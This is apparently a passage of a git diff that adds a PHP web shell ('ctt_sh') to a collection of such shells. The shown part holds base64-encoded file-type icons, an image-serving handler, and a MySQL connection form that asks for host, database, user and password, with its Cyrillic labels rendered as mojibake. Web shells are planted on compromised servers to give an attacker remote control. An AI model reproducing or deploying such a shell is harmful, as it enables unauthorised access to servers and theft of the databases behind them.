+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_m1v"=> +"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A". +"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW". +"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ". +"BHx9IBOAg4SIDBEAOw==", +"ext_m3u"=> +"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4". +"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh". +"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ". +"PXeKNQMPPml9NVaMBDUVIQA7", +"ext_mdb"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM". +"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7", +"ext_mid"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE". +"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ". +"TBeDrHZ7NXm/pwQAOw==", +"ext_midi"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE". +"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ". +"TBeDrHZ7NXm/pwQAOw==", +"ext_mov"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm". +"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=", +"ext_mp3"=> +"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP". +"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5". +"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha". +"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG". +"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo". +"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI". +"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI". +"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE". +"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz". +"hgxdhpIlCjQoMSAAOw==", +"ext_mp4"=> +"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP". +"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5". +"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha". +"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG". +"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo". +"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI". +"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI". +"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE". +"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz". +"hgxdhpIlCjQoMSAAOw==", +"ext_mpe"=> +"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//". +"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP". +"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP". +"Bwh6fBovAAkHCYYihS4iEQA7", +"ext_mpeg"=> +"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//". +"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP". +"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP". +"Bwh6fBovAAkHCYYihS4iEQA7", +"ext_mpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//". +"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP". +"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP". +"Bwh6fBovAAkHCYYihS4iEQA7", +"ext_nfo"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_ocx"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ". +"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==", +"ext_pcx"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pif"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW". +"mJRRiRQ2Z5+odNqxWK/YrDUCADs=", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_png"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_reg"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM". +"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7". +"GZPK43E0DI1oC4J4TO4qtOhSAgA7", +"ext_rev"=> +"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC". +"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6". +"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99". +"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw". +"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e". +"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6". +"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7", +"ext_rmi"=> +"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS". +"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk". +"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7", +"ext_rtf"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_shtm"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_shtml"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_so"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_stl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_sys"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_theme"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA". +"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_url"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_vbe"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH". +"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16". +"seAwLAEAOw==", +"ext_vbs"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ". +"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY". +"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==", +"ext_vcf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//". +"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4". +"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7", +"ext_wav"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7", +"ext_xsl"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA". +"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh". +"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD". +"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==" +); +$imgequals = array( +"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), +"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"), +"ext_htaccess"=>array("ext_htaccess","ext_htpasswd") +); + ksort($arrimg); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) + { + if (in_array($img,$v)) {$img = $k;} + } + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + echo "<center>"; + $k = array_keys($arrimg); + foreach ($k as $u) + { + echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>"; + } + echo "</center>"; + } + exit; +} +if ($act == "about") +{ + $dàta = "Any stupid copyrights and copylefts"; + echo $data; +} + +$microtime = round(getmicrotime()-$starttime,4); +?> + +<html> +<head> +</head> +<body> +<center> <br><br> +<table width=620 cellpadding=0 cellspacing=0 align=center> + <col width=1> + <col width=600> + <col width=1> + <tr> <td></td> + <td align=left class=texte> + <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'> + <table border=0 align=center> + <col> + <col align=left> + <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'> + آâهنèٍه نàييûه نëے ïîنêë‏÷هيè‏ ê mySQL ٌهًâهًَ!<br><br> + </td> + </tr> + <tr> <td class=texte>ہنًهٌ ٌهًâهًà:</td> + <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td> + </tr> + <tr> <td class=texte>حàçâàيèه لàçû:</td> + <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> + </tr> + <tr> <td class=texte>ثîمèي:</td> + <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> + </tr> + <tr> <td class=texte>دàًîëü</td> + <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> + </tr> + </table> + <br> <center> <br><br> + <input type='submit' value=' دîنêë‏÷èٌٍے ' class=form></center> </form> <br><br> + </td> + <td></td> + </tr> + <tr> <td height=1 colspan=3></td> + </tr> + </table> </center> + </body> + </html> + diff --git a/php/PHPshell/ctt_sh/ctt_sh.jpg b/php/PHPshell/ctt_sh/ctt_sh.jpg new file mode 100644 index 0000000..f7192aa Binary files /dev/null and 